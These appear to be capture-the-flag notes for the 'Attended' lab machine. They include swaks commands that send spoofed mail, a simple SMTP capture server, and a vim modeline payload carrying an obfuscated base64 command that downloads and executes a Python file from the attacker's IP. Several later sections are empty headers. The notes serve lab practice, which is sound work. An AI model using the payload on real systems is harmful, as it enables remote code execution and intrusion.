Attended

Notes for https://youtu.be/uAvvrBO7zlk

User

Send mails via swaks

1) swaks --from 'root@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
2) swaks --from 'freshness@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
3) swaks --from 'freshness@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb --attach payload.txt

Mail Server

from __future__ import print_function
from datetime import datetime
import asyncore
from smtpd import SMTPServer

class EmlServer(SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,rcpt_options=None):
        print(f"From: {mailfrom}")
        print(f"To: {rcpttos}")
        print("Data:")
        for line in data.split(b"\n"):
            print(line)

def run():
    EmlServer(('0.0.0.0', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    run()

Payload.txt

This pulls a (python-) file called "x" from our webserver and executes it:

:!echo aW1wb3J0IHJlcXVlc3RzIGFzIHI7ZXhlYyhyLmdldCgnaHR0cDovLzEwLjEwLjE0Ljc4L3gnKS50ZXh0KQ==| openssl base64 -d -A | python2.7 -
||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="

HTTP Reverse Shell

Root

Prepare OpenBSD VM

export PKG_PATH=https://mirror.fsrv.services/pub/OpenBSD/6.8/packages/amd64/
pkg_add -v gdb
pkg_add wget
pkg_add nano
pkg_add py3-pip
pkg_add git
wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
export LC_CTYPE=C.UTF-8
egdb

EAX-Finder

Final Exploit

Last updated